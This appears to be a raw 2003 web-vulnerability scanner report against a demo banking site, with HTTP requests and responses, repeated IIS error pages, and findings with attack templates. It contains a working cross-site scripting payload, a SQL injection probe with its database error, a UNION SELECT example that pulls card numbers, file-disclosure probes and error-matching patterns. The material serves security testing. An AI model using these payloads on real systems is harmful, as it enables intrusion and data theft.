Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:42 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /_vti_txt/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_txt/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_txt/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /_vti_log/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:49:05 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
OSX Content File (FBCIndex)By exploiting the case-insensitivity of HFS+, an attacker can evade Apache's access controls.
Using mod_hfs (which takes care of case-insensitivity in directory names) and using < FilesMatch> (with well-chosen regular expressions) instead of < Files> directives (to take care of case-insensitivity in filenames), we can "cure" the case-insensitivity problem and restore Apache's access controls. <br><br>
However, there is another problem lurking. A vulnerability has been found that allows remote attackers to list the content of the directory and view the index file created for those files by requesting an a special file that automatically created by Mac OS X.GET /_vti_log/<attack>.FBCIndex</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
40[13] |200 |Bud2GET /_vti_pvt/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_pvt/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_pvt/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /join.asp?name=1"style="background:url(javascript:alert('XSS'))"%20"&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)POST /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login='&password=333%2D333%2D3333test@test999.com&graphicOption=minimumHTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:30 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 358
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'user = ''''.</font>
<p>
<font face="Arial" size=2>/login1.asp</font><font face="Arial" size=2>, line 10</font> SQL Injection (')SQL injection is an attack technique that can be used to extract, modify, add or delete information from database servers that are used by vulnerable web applications. SQL injection vulnerabilities are caused by an insecure programming technique that allows client-supplied data to interfere with the syntax of SQL queries. SQL is a programming language that is used by applications to communicate with database systems. For example, the following SQL query would obtain the price of item number 12345:<br><br>
SELECT Price FROM Products WHERE ItemNumber = '<b>12345</b>';<br><br>
The number in bold might be supplied by the client in an HTTP GET or POST parameter, as in the following URL:<br><br>
http://www.server.com/GetItemPrice?ItemNumber=<b>12345</b><br><br>
In the example above, the client-supplied value (12345) is simply used as a numeric expression to indicate the item for which the user wants to obtain the price. The web application takes this value and inserts it into the SQL statement in between the single quotes in the WHERE clause. However, consider the following URL:<br><br>
http://www.server.com/GetItemPrice?ItemPrice?ItemNumber=<b>0' UNION SELECT CreditCardNumber FROM Customers WHERE '1'='1</b><br><br>
This would cause the web application to produce the following SQL statement:<br><br>
SELECT Price FROM Products WHERE ItemNumber = '<b>0' UNION SELECT CreditCardNumber FROM Customers WHERE '1'='1</b>';<br><br>
In this case, the client-supplied value has actually modified the SQL statement itself and 'injected' a statement of his or her choosing. Instead of the price of an item, this statement will retrieve a customer's credit card number. SQL injection can be avoided by using secure programming techniques that prevent client-supplied values from interfering with SQL statement syntax.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login=<attack>'</attack>&password=333%2D333%2D3333test@test999.com&graphicOption=minimum\[ODBC\sSQL |\[SQL\sServer\] |Microsoft\sOLE\sDB\sProvider\sfor |\[ODBC\sMicrosoft |Microsoft\sJET\sDatabase\sEngine |\[Oracle\]ORA |\[ODBC\sdriver\sfor\sOracle\] |Microsoft\sOLE\sDB\sProvider |ODBC\sError |ORA-01 |SqlException |OleDbExceptionGET /rootlogin.asp.old HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:03 GMT
Content-Type: application/octet-stream
